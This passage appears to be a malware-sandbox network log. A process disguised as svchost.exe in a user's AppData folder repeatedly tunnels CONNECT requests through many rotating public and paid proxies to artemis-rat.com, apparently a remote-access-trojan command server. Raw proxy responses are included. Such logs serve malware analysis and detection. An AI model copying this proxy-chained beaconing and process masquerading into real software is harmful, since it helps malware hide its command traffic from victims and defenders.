Mar 9, 2024 13:14:30.820242882 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2499	192.168.2.5	58051	200.174.198.95	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.518193007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.333441019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.443104982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.537084103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849498034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2500	192.168.2.5	58094	58.234.116.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.519644022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2501	192.168.2.5	58156	93.190.142.57	26541	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.520140886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.820435047 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2502	192.168.2.5	58118	43.155.142.116	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.524900913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2503	192.168.2.5	58191	46.17.63.166	4444	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.533401012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.829971075 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2504	192.168.2.5	58169	47.243.114.192	8180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.539856911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2505	192.168.2.5	58170	154.12.178.107	29985	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.539937973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2506	192.168.2.5	58168	125.227.225.157	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.540205002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2507	192.168.2.5	58195	121.128.194.154	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.540205956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2508	192.168.2.5	58097	120.77.148.138	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.540435076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.878246069 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2509	192.168.2.5	58098	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.540435076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2510	192.168.2.5	58140	148.72.206.84	34761	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.563369036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.333482027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.443039894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.537065029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849405050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2511	192.168.2.5	58328	104.17.84.150	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.565341949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.719847918 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2512	192.168.2.5	58206	52.67.10.183	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.570250034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.899240971 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2513	192.168.2.5	58202	177.12.118.160	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.572932005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2514	192.168.2.5	58311	142.4.123.41	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.576638937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2515	192.168.2.5	57170	162.223.94.164	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.577100039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.646107912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.646687984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2516	192.168.2.5	58325	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.577218056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2517	192.168.2.5	58145	194.28.91.10	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.583933115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2518	192.168.2.5	58384	31.43.179.160	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.608773947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.763484955 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2519	192.168.2.5	58110	146.190.84.209	18255	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.610707045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.333571911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.443027973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.537054062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646692991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2520	192.168.2.5	58155	20.206.106.192	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.610728979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.932524920 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2521	192.168.2.5	58361	172.67.206.105	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.610853910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.764961004 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2522	192.168.2.5	58247	202.162.219.10	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.621432066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2523	192.168.2.5	58275	211.222.252.187	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.627131939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.931523085 CET	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2524	192.168.2.5	58411	162.159.242.150	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.627338886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
